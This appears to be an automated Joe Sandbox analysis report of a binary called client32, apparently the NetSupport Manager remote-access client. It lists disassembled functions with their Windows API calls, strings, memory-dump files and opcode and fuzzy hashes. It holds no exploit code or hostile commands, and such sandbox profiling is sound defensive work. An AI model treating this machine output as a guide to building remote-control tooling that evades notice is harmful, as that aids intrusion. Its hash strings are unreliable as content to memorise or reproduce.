                                                                                                                                                                • Instruction Fuzzy Hash: 5FE06572A54228AFD714DFB5D844A97F7E8EB5C722F00852AE95597240C670E844CFD0
                                                                                                                                                                Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091
                                                                                                                                                                • m_hWnd, xrefs: 11001096
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2046328329-2830328467
                                                                                                                                                                • Opcode ID: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                                                                                                • Instruction ID: 77f34a7b6d351dc7c2bdf78fd4e91b5ab9e9d0feae3f5383371c0572f9fc60e5
                                                                                                                                                                • Opcode Fuzzy Hash: 870a264c4857fd7c20b43c7043125336c03270db109b755264ed45be6d9d6118
                                                                                                                                                                • Instruction Fuzzy Hash: 98E01ABA71025DBFD714CE95EC81EE7B3ACEB48364F008529FA2997640D6B0E85087A1
                                                                                                                                                                Function 11001040 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageA.USER32(?,?,?,?), ref: 11001073
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001051
                                                                                                                                                                • m_hWnd, xrefs: 11001056
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 819365019-2830328467
                                                                                                                                                                • Opcode ID: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                                                                                                • Instruction ID: cf35a841ff9db8a25d072bdd62e9da3c8eef3a8b3e547f8f1cf52fd96b7d4918
                                                                                                                                                                • Opcode Fuzzy Hash: 46c3cce5aab5cc82a9d8ff0d4253417d22b235869f514457b0a8909ae4eb1d0c
                                                                                                                                                                • Instruction Fuzzy Hash: 3CE04FB570021DABD310CA95DC85ED7B39CEB54354F008429F92887600D6B0F89087A0
                                                                                                                                                                Function 110010D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • PostMessageA.USER32(?,?,?,?), ref: 11001103
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010E1
                                                                                                                                                                • m_hWnd, xrefs: 110010E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 906220102-2830328467
                                                                                                                                                                • Opcode ID: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                                                                                                • Instruction ID: e326bc5325dc434b8864e09602644acab64ba33727794dfa8c4f249b36814fc9
                                                                                                                                                                • Opcode Fuzzy Hash: 27df700c695a826ec584c3a5c6c16cda0f02aa3721c02321218cde4e7ec8e80e
                                                                                                                                                                • Instruction Fuzzy Hash: 81E04FB970025DAFD314CA95DC45ED6B3ACEB54764F008429F92887600DA70F84087A0
                                                                                                                                                                Function 110154A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • KillTimer.USER32(?,?), ref: 110154CB
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110154B1
                                                                                                                                                                • m_hWnd, xrefs: 110154B6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2229609774-2830328467
                                                                                                                                                                • Opcode ID: b09ac9e3bafe79c70f551ef63f6776fd18c6c78c83775810998dd521224a03f3
                                                                                                                                                                • Instruction ID: c7e2616952198e08bfd00930ae35e287fb306d58ce37531451bcc3d486bdba1a
                                                                                                                                                                • Opcode Fuzzy Hash: b09ac9e3bafe79c70f551ef63f6776fd18c6c78c83775810998dd521224a03f3
                                                                                                                                                                • Instruction Fuzzy Hash: 35E08679B40319ABD314DB95DC50E96F3A8EB54314F008429F96547740DA71F94087A0
                                                                                                                                                                Function 11001110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                                                                • m_hWnd, xrefs: 11001126
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1604732272-2830328467
                                                                                                                                                                • Opcode ID: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                                                                                                • Instruction ID: 825df7ee52a795a689a6901b0494195ba864db9fe7d9b2cdbf909eadc0dc9b6b
                                                                                                                                                                • Opcode Fuzzy Hash: b62a108dd0f1a298b3da6ec4c3cd6e44d75acd6edd0f1b2899dc5cb61eb0235d
                                                                                                                                                                • Instruction Fuzzy Hash: 4ED02BB561031CABC314DA92DC41FD2F38CAB20364F004435F52542500D571F54083A4
                                                                                                                                                                Function 11001000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19timeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                                                                • m_hWnd, xrefs: 11001016
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2229609774-2830328467
                                                                                                                                                                • Opcode ID: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                                                                                                • Instruction ID: d507351e39c60ba8400a42a64aee1b3b281c2e630578985a984e8bb8925e1fd6
                                                                                                                                                                • Opcode Fuzzy Hash: 76242f1f7a5656083f48ec4c6fb46d4250b195dfa3fd92ba0bbd6b47707e0e7b
                                                                                                                                                                • Instruction Fuzzy Hash: 21D02B76B4031DABD310C691DC44FD2F39CD714364F008035F55446500D570F8408390
                                                                                                                                                                Function 1103D5B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(NSMClassList,00000000), ref: 1103D5BF
                                                                                                                                                                • SendMessageA.USER32(00000000,0000065B,?,?), ref: 1103D5D7
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FindMessageSendWindow
                                                                                                                                                                • String ID: NSMClassList
                                                                                                                                                                • API String ID: 1741975844-2474587545
                                                                                                                                                                • Opcode ID: 718772859f33f448c89d93b5f37c290420823d037368ac38c074b4f83ca60ad9
                                                                                                                                                                • Instruction ID: 7f82e6ac788c827237b9f9d92b71e0ea3c568c774f1ab0da8c2af698dd4ba3dc
                                                                                                                                                                • Opcode Fuzzy Hash: 718772859f33f448c89d93b5f37c290420823d037368ac38c074b4f83ca60ad9
                                                                                                                                                                • Instruction Fuzzy Hash: 37D01236650228BBD7049BA68C49FA7BB9DEB85755F018055F6689A180CA71D50187E0
                                                                                                                                                                Function 1100D4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersion.KERNEL32(1100D71E,?,00000000,?,1100CA4A,?), ref: 1100D4A9
                                                                                                                                                                • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CA4A,?), ref: 1100D4B8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoadVersion
                                                                                                                                                                • String ID: AudioCapture.dll
                                                                                                                                                                • API String ID: 3209957514-2642820777
                                                                                                                                                                • Opcode ID: 31b78285a9ca15673ba87c57432177bf1cff156aadcdf76d1ced8aa22ba9c77d
                                                                                                                                                                • Instruction ID: ab88030cee3ff84c3afa862bf4e3a54fa00084ca03ad85f46d803c7cbd51aa0e
                                                                                                                                                                • Opcode Fuzzy Hash: 31b78285a9ca15673ba87c57432177bf1cff156aadcdf76d1ced8aa22ba9c77d
                                                                                                                                                                • Instruction Fuzzy Hash: DBE01734E2116B8BF7468BB58C4839DBBD1A740A9AFC250B0E826C1548FB689440DB20
                                                                                                                                                                Function 11143320 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
